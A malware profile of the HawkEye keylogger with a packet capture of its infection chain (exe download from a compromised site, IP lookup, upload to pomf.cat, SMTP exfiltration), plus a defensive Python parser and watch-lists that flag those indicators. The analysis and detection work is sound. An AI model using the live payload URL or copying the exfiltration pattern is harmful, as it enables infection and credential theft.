Hawkeye is often installed in a bundle with other malware. It is a Trojan and keylogger used to harvest private information such as passwords and login credentials, and it includes anti-analysis and detection-evasion functions.
Type: Keylogger
Origin: Unknown
First seen: 1 January, 2013
Last seen: 16 January, 2020
Also known as: Predator Pain, HawkEye Reborn
2020-01-16 05:49:31.337357 IP 192.168.86.25.57734 > 103.74.123.3.80: Flags [P.], seq 1:434, ack 1, win 16425, length 433: HTTP: GET /wp-content/images/views/lpL8Nb1A9u7xmz6.exe HTTP/1.1
GET /wp-content/images/views/lpL8Nb1A9u7xmz6.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: robotrade.com.vn
Connection: Keep-Alive
2020-01-16 05:49:31.582612 IP 103.74.123.3.80 > 192.168.86.25.57734: Flags [P.], seq 1:232, ack 434, win 60, length 231: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Type: application/x-msdownload
Last-Modified: Tue, 14 Jan 2020 23:25:30 GMT
Accept-Ranges: bytes
Content-Length: 770048
Date: Thu, 16 Jan 2020 10:49:30 GMT
Server: LiteSpeed
2020-01-16 05:49:31.582621 IP 103.74.123.3.80 > 192.168.86.25.57734: Flags [.], seq 232:1692, ack 434, win 60, length 1460: HTTP
(first data segment of the download: MZ header, "This program cannot be run in DOS mode", then the PE..L signature of a PE image with machine type i386)
2020-01-16 05:57:38.908500 IP 192.168.86.25.58597 > 192.168.86.1.53: 21329+ A? bot.whatismyipaddress.com. (43)
2020-01-16 05:57:38.931943 IP 192.168.86.1.53 > 192.168.86.25.58597: 21329 1/0/0 A 66.171.248.178 (59)
2020-01-16 05:57:38.932384 IP 192.168.86.25.57749 > 66.171.248.178.80: Flags [S], seq 3330673864, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
2020-01-16 05:57:39.018722 IP 66.171.248.178.80 > 192.168.86.25.57749: Flags [S.], seq 3621119920, ack 3330673865, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2020-01-16 05:57:39.018902 IP 192.168.86.25.57749 > 66.171.248.178.80: Flags [.], ack 1, win 16425, length 0
2020-01-16 05:57:39.019044 IP 192.168.86.25.57749 > 66.171.248.178.80: Flags [P.], seq 1:76, ack 1, win 16425, length 75: HTTP: GET / HTTP/1.1
GET / HTTP/1.1
Host: bot.whatismyipaddress.com
Connection: Keep-Alive
2020-01-16 05:57:39.108839 IP 66.171.248.178.80 > 192.168.86.25.57749: Flags [FP.], seq 1:168, ack 76, win 256, length 167: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server:
Date: Thu, 16 Jan 2020 10:57:38 GMT
Connection: close
Content-Length: 13
(body: 73.135.186.44, the requester's public IP address as echoed by the service)
2020-01-16 05:57:39.109947 IP 192.168.86.25.58823 > 192.168.86.1.53: 48639+ A? mail.privateemail.com. (39)
2020-01-16 05:57:39.133179 IP 192.168.86.1.53 > 192.168.86.25.58823: 48639 1/0/0 A 198.54.122.60 (55)
2020-01-16 05:57:39.133535 IP 192.168.86.25.57750 > 198.54.122.60.587: Flags [S], seq 1866593274, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
2020-01-16 05:57:42.829292 IP 192.168.86.25.53665 > 192.168.86.1.53: 26931+ A? pomf.cat. (26)
2020-01-16 05:57:42.894921 IP 192.168.86.1.53 > 192.168.86.25.53665: 26931 1/0/0 A 66.55.90.17 (42)
2020-01-16 05:57:42.895402 IP 192.168.86.25.57751 > 66.55.90.17.80: Flags [S], seq 1844683945, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
2020-01-16 05:57:42.974800 IP 66.55.90.17.80 > 192.168.86.25.57751: Flags [S.], seq 2892794916, ack 1844683946, win 29200, options [mss 1460,nop,nop,sackOK,nop,wscale 7], length 0
2020-01-16 05:57:42.974977 IP 192.168.86.25.57751 > 66.55.90.17.80: Flags [.], ack 1, win 16425, length 0
2020-01-16 05:57:42.975136 IP 192.168.86.25.57751 > 66.55.90.17.80: Flags [P.], seq 1:196, ack 1, win 16425, length 195: HTTP: POST /upload.php HTTP/1.1
POST /upload.php HTTP/1.1
Content-Type: multipart/form-data; boundary=-----------------------------8d79a48fbd2857a
Host: pomf.cat
Content-Length: 58733
Expect: 100-continue
Connection: Keep-Alive
2020-01-16 05:57:43.060637 IP 66.55.90.17.80 > 192.168.86.25.57751: Flags [P.], seq 1:26, ack 196, win 237, length 25: HTTP: HTTP/1.1 100 Continue
HTTP/1.1 100 Continue
2020-01-16 05:57:43.060891 IP 192.168.86.25.57751 > 66.55.90.17.80: Flags [P.], seq 196:331, ack 26, win 16418, length 135: HTTP
-------------------------------8d79a48fbd2857a
Content-Disposition: form-data; name="files[]"; filename="file.png"
Content-Type: image/png
2020-01-16 05:57:43.139827 IP 66.55.90.17.80 > 192.168.86.25.57751: Flags [P.], seq 26:431, ack 331, win 245, length 405: HTTP: HTTP/1.1 301 Moved Permanently
HTTP/1.1 301 Moved Permanently
Server: nginx/1.10.3 (Ubuntu)
Date: Thu, 16 Jan 2020 10:57:43 GMT
Content-Type: text/html
Content-Length: 194
Connection: keep-alive
Location: https://pomf.cat/upload.php
(HTML body: 301 Moved Permanently, nginx/1.10.3 (Ubuntu))
2020-01-16 05:57:52.682786 IP 198.54.122.60.587 > 192.168.86.25.57756: Flags [P.], seq 1:33, ack 1, win 3650, length 32
220 PrivateEmail.com Mail Node
2020-01-16 05:57:52.683002 IP 192.168.86.25.57756 > 198.54.122.60.587: Flags [P.], seq 1:23, ack 33, win 16677, length 22
EHLO ry4wn-7-malware
2020-01-16 05:57:52.768664 IP 198.54.122.60.587 > 192.168.86.25.57756: Flags [.], ack 23, win 3655, length 0
2020-01-16 05:57:52.768675 IP 198.54.122.60.587 > 192.168.86.25.57756: Flags [P.], seq 33:182, ack 23, win 3655, length 149
250-MTA-07.privateemail.com
250-PIPELINING
250-SIZE 81788928
250-ETRN
250-AUTH PLAIN LOGIN
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 STARTTLS
2020-01-16 05:57:52.768900 IP 192.168.86.25.57756 > 198.54.122.60.587: Flags [P.], seq 23:33, ack 182, win 16639, length 10
STARTTLS
2020-01-16 05:57:52.854183 IP 198.54.122.60.587 > 192.168.86.25.57756: Flags [P.], seq 182:206, ack 33, win 3655, length 24
220 Ready to start TLS
2020-01-16 05:57:52.854586 IP 192.168.86.25.57756 > 198.54.122.60.587: Flags [P.], seq 33:190, ack 206, win 16633, length 157
(TLS ClientHello; the server_name extension carries mail.privateemail.com)
2020-01-16 05:57:52.941314 IP 198.54.122.60.587 > 192.168.86.25.57756: Flags [.], ack 190, win 3697, length 0
2020-01-16 05:57:52.943689 IP 198.54.122.60.587 > 192.168.86.25.57756: Flags [.], seq 206:1666, ack 190, win 3697, length 1460
(TLS ServerHello and Certificate: issuer Sectigo RSA Domain Validation Secure Server CA, Sectigo Limited, Salford, Greater Manchester, GB; subject privateemail.com, Domain Control Validated, PositiveSSL Multi-Domain; validity 2019-10-18 00:00:00Z to 2020-11-13 23:59:59Z)
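The capture above shows the full Hawkeye behaviour chain in one trace: an .exe pulled over plain HTTP from a compromised WordPress site by a client whose Accept header claims it wants images (the default WinINet / URLDownloadToFile request, not a real browser), a public-IP lookup against bot.whatismyipaddress.com, a multipart upload to pomf.cat, and SMTP submission to mail.privateemail.com on port 587 whose EHLO leaks the victim hostname. The script below is an added example, not code from the page or from the Hawkeye authors: it groups tcpdump -A text into packets, extracts those indicators, and returns a verdict. The watch-lists IP_CHECK_HOSTS and UPLOAD_HOSTS are assumptions (only the entries that occur in this capture are grounded), and SAMPLE is constructed from the page's capture, trimmed to the lines the parser needs.

```python
"""Extract the Hawkeye-style behaviour chain from tcpdump -A text.

Added example (not from the page or the Hawkeye authors). tcpdump prints one
summary line per packet followed by the decoded payload; the parser keeps that
association and then looks for:
  1. an .exe fetched over plain HTTP with an image/* Accept header,
  2. the server answering with application/x-msdownload,
  3. a DNS lookup of a public-IP echo service,
  4. a multipart POST to an anonymous file-sharing host,
  5. SMTP submission (EHLO on port 587), which also leaks the client hostname.
"""
import re
from dataclasses import dataclass, field

# Hypothetical watch-lists; only the first entry of each occurs in the capture.
IP_CHECK_HOSTS = {"bot.whatismyipaddress.com", "checkip.dyndns.org"}
UPLOAD_HOSTS = {"pomf.cat"}

SUMMARY_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d+) IP "
    r"(?P<src>\d+(?:\.\d+){3})\.(?P<sport>\d+) > "
    r"(?P<dst>\d+(?:\.\d+){3})\.(?P<dport>\d+): "
)

# Constructed from the capture on the page, trimmed to the lines needed.
SAMPLE = """\
2020-01-16 05:49:31.337357 IP 192.168.86.25.57734 > 103.74.123.3.80: Flags [P.], seq 1:434, ack 1, win 16425, length 433: HTTP: GET /wp-content/images/views/lpL8Nb1A9u7xmz6.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: robotrade.com.vn
2020-01-16 05:49:31.582612 IP 103.74.123.3.80 > 192.168.86.25.57734: Flags [P.], seq 1:232, ack 434, win 60, length 231: HTTP: HTTP/1.1 200 OK
Content-Type: application/x-msdownload
Content-Length: 770048
2020-01-16 05:57:38.908500 IP 192.168.86.25.58597 > 192.168.86.1.53: 21329+ A? bot.whatismyipaddress.com. (43)
2020-01-16 05:57:42.975136 IP 192.168.86.25.57751 > 66.55.90.17.80: Flags [P.], seq 1:196, ack 1, win 16425, length 195: HTTP: POST /upload.php HTTP/1.1
Content-Type: multipart/form-data; boundary=-----------------------------8d79a48fbd2857a
Host: pomf.cat
Content-Length: 58733
2020-01-16 05:57:52.683002 IP 192.168.86.25.57756 > 198.54.122.60.587: Flags [P.], seq 1:23, ack 33, win 16677, length 22
EHLO ry4wn-7-malware
"""


@dataclass
class Packet:
    ts: str
    src: str
    sport: int
    dst: str
    dport: int
    summary: str                                  # text after "src > dst:"
    payload: list = field(default_factory=list)   # decoded lines that followed


def parse_tcpdump(text):
    """Group tcpdump -A lines into Packet objects (summary plus payload lines)."""
    packets = []
    for line in text.splitlines():
        m = SUMMARY_RE.match(line)
        if m:
            packets.append(Packet(m["ts"], m["src"], int(m["sport"]), m["dst"],
                                  int(m["dport"]), line[m.end():].strip()))
        elif packets and line.strip():
            packets[-1].payload.append(line.rstrip())
    return packets


def headers(pkt):
    """Lower-cased 'Name: value' lines from the payload; request lines, SMTP
    replies and raw byte noise without a colon are ignored."""
    out = {}
    for line in pkt.payload:
        if ":" in line and not line.startswith(("GET ", "POST ", "HTTP/")):
            name, _, value = line.partition(":")
            out[name.strip().lower()] = value.strip()
    return out


def find_indicators(packets):
    """Return (timestamp, kind, detail) tuples in capture order."""
    hits = []
    for p in packets:
        h = headers(p)
        m = re.search(r"HTTP: GET (\S+\.exe) HTTP/1\.[01]$", p.summary)
        if m:  # 1. executable over HTTP; WinINet downloads claim to want images
            claims_image = h.get("accept", "").startswith("image/")
            hits.append((p.ts, "exe_download",
                         f"{h.get('host', p.dst)}{m.group(1)} (Accept claims images: {claims_image})"))
        if " 200 OK" in p.summary and h.get("content-type") == "application/x-msdownload":
            hits.append((p.ts, "exe_served",  # 2. server confirms it is a binary
                         f"{p.src} Content-Length {h.get('content-length', '?')}"))
        m = re.search(r" A\? (\S+?)\.? \(\d+\)$", p.summary)
        if m and m.group(1) in IP_CHECK_HOSTS:  # 3. public-IP echo lookup
            hits.append((p.ts, "ip_lookup", m.group(1)))
        if ("HTTP: POST " in p.summary and h.get("host") in UPLOAD_HOSTS
                and "multipart/form-data" in h.get("content-type", "")):
            hits.append((p.ts, "file_upload",  # 4. multipart upload to paste host
                         f"{h['host']} {h.get('content-length', '?')} bytes"))
        ehlo = next((l for l in p.payload if l.startswith("EHLO ")), None)
        if p.dport == 587 and ehlo:  # 5. SMTP submission; EHLO carries the hostname
            hits.append((p.ts, "smtp_submission",
                         f"{p.dst}:587 client name {ehlo.split()[1]}"))
    return hits


def verdict(hits):
    """Hawkeye's exfil chain: an IP lookup followed by SMTP and/or an upload."""
    kinds = {k for _, k, _ in hits}
    if "ip_lookup" in kinds and kinds & {"smtp_submission", "file_upload"}:
        return "keylogger exfiltration chain"
    if "exe_download" in kinds:
        return "executable download only"
    return "nothing flagged"


if __name__ == "__main__":
    found = find_indicators(parse_tcpdump(SAMPLE))
    for ts, kind, detail in found:
        print(ts, kind, detail)
    print("verdict:", verdict(found))
```

Two caveats when turning this into a production rule. The plaintext POST to pomf.cat was answered with a 301 to https://pomf.cat/upload.php, so the 58733-byte body never reached the server over port 80 in this trace and the capture does not show whether the client retried over TLS; alert on the attempt, not on a completed upload. The SMTP session switches to TLS right after STARTTLS, so the credentials and message body are not visible here; the EHLO hostname, the destination port and the server_name in the ClientHello are what remain observable.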